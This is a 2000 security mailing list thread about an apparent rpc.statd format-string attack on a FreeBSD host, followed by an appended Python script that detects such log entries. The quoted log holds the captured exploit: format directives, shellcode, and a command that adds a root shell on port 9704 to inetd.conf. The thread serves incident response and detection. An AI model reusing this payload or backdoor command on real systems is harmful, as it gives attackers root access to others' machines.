Security Incidents mailing list archives

Re: rpc.statd exploit?


From: Fernando Cardoso <fernando () BN PT>
Date: Fri, 18 Aug 2000 13:26:54 +0100

Huuummm, let me guess, origin was Korea? I've just seen these SYN scans
from 210.180.16.150:

Aug 18 12:20:25  IDS198/SYN FIN Scan: 210.180.16.150:9704 -> x.x.x.x.:9704
Aug 18 12:34:19  IDS198/SYN FIN Scan: 210.180.16.150:2222 -> x.x.x.x:2222

Port 2222 is a classic. I've found lots of Korean compromised servers
dropping you in a rootshell when telnetting to this port.


There are a few known exploits for statd in the wild, but I don't know any
for FreeBSD. Since you found your NIC in promiscuous mode, definitely check
for a rootkit. If the kiDD1e left traces in your logs I'm sure he was clumsy
somewhere else... Did you already try a netstat -a or telnetting to port
9704? If the netstat doesn't help (a replaced netstat is frequent in
rootkits) download lsof and check what's open in the server.


Fernando


_________________________________________________________________
Fernando Cardoso                        Phone:  +351 21 7982186
Network Administrator           Fax:            +351 217982185
National Library                        E-mail: fernando () bn pt
Portugal                                PGP ID: 28551CB8




Hello all,

While looking through the log files, I came across a few peculiar lines
that appear to be an attempt to overflow the rpc.statd and insert a root
shell into /etc/inetd.conf on port 9704.  Later, I noticed that the NIC
went into promisc. mode and dropped out of it twice.  Is anyone familiar
with this exploit?  What should I be looking for to tell if it was
successful?  The system is FreeBSD 4.1-stable.  FreeBSD's website
revealed no information regarding exploits on rpc.statd.

Any information is appreciated.

Aug 12 02:59:14 rpc.statd: Invalid hostname to sm_mon:
^D<F7><FF><BF>^D<F7><FF><BF>^E<F7><FF><BF>^E<F7><FF><BF>^F<F7><FF><BF>
^F<F7><FF><BF>^G<F7><FF><BF>^G<F7><FF><BF>%08x %08x %08x %08x
%08x %08x
%08x %08x %08x %08x %08x %08x %08x %08x %0242x%n%055x%n%012x
%n%0192x%nM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P
M-^PM-^PM-
^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-
^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P
M-^PM-^PM-
^PM-^P<EB>K^M-  v<AC>M-^C<EE> M-^M^(M-^C<C6> M- ^<B0>M-^C
<EE> M-^M^.M-^C<C6> M-^C<C3> M-^C<EB>#M-        ^<B4>1<C0>M-^C<EE>
M-^HF'M-^HF*M-^C<C6> M-^HF<AB>M-     F<B8><B0>+, M-  <F3>M-^MN
<AC>M-^MV<B8><CD>M-^@1<DB>M-
   <D8>@<CD>M-^@<E8><B0><FF><FF><FF>/bin/sh -c echo 9704 stream tcp
nowait root /bin/sh sh -i >> /etc/i
netd.conf;killall -HUP inetd


Dave Byrne
Systems Administrator
AtomicMinds
(858) 350-0012
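As an added example (not code from either poster), a small Python triage script for the situation described in this thread: it flags rpc.statd "Invalid hostname to sm_mon" lines that carry format-string directives or an injected inetd.conf service entry, extracts the port named in that entry, and cross-checks it against `netstat -an` LISTEN output. The log and netstat samples are constructed, not taken from a real host.

```python
import re

# Constructed sample syslog lines: a benign sm_mon complaint, a line shaped
# like the exploit attempt in the thread, and an unrelated sshd line.
SAMPLE_LOG = """\
Aug 12 02:59:14 rpc.statd: Invalid hostname to sm_mon: badhost.example
Aug 12 02:59:14 rpc.statd: Invalid hostname to sm_mon: ^D<F7><FF><BF>%08x %08x %0242x%n%055x%n M-^PM-^P/bin/sh -c echo 9704 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd
Aug 12 03:00:01 sshd[123]: Accepted publickey for dave from 10.0.0.5
"""

# Constructed BSD `netstat -an` output (a rootkit may replace netstat, so
# feed this function lsof -i output or a known-good binary's output instead).
SAMPLE_NETSTAT = """\
Active Internet connections (including servers)
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
tcp4       0      0  *.9704                 *.*                    LISTEN
tcp4       0      0  *.22                   *.*                    LISTEN
udp4       0      0  *.111                  *.*
"""

STATD_RE = re.compile(r"rpc\.statd: Invalid hostname to sm_mon: (?P<host>.*)$")
# A real hostname never contains printf directives; %n writes to memory.
FMT_RE = re.compile(r"%0?\d*[xn]")
# The injected inetd.conf service line: "<port> stream tcp nowait root ..."
INETD_RE = re.compile(r"(?P<port>\d{1,5}) stream tcp nowait root")

def analyze_line(line):
    """Return a finding dict for a suspicious rpc.statd line, else None."""
    m = STATD_RE.search(line)
    if not m:
        return None
    host = m.group("host")
    hits = FMT_RE.findall(host)
    inetd = INETD_RE.search(host)
    if not hits and not inetd:
        return None
    return {
        "directives": len(hits),
        "n_writes": sum(1 for h in hits if h.endswith("n")),
        "backdoor_port": int(inetd.group("port")) if inetd else None,
        "appends_inetd_conf": "inetd.conf" in host,
    }

def scan_log(text):
    """Map 1-based line number -> finding for every suspicious line."""
    found = {}
    for n, line in enumerate(text.splitlines(), start=1):
        f = analyze_line(line)
        if f:
            found[n] = f
    return found

def listening_ports(netstat_output):
    """Parse BSD netstat TCP lines in LISTEN state into a set of local ports."""
    ports = set()
    for line in netstat_output.splitlines():
        p = line.split()
        if len(p) >= 6 and p[0].startswith("tcp") and p[-1] == "LISTEN":
            ports.add(int(p[3].rsplit(".", 1)[1]))
    return ports

def backdoor_ports_listening(log_text, netstat_output):
    """Ports named in an injected inetd line that are actually listening."""
    wanted = {f["backdoor_port"] for f in scan_log(log_text).values()
              if f["backdoor_port"]}
    return sorted(wanted & listening_ports(netstat_output))
```

A non-empty result from backdoor_ports_listening is strong evidence the append to inetd.conf succeeded and inetd was re-read; an empty result is not proof of failure if netstat itself is untrusted.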
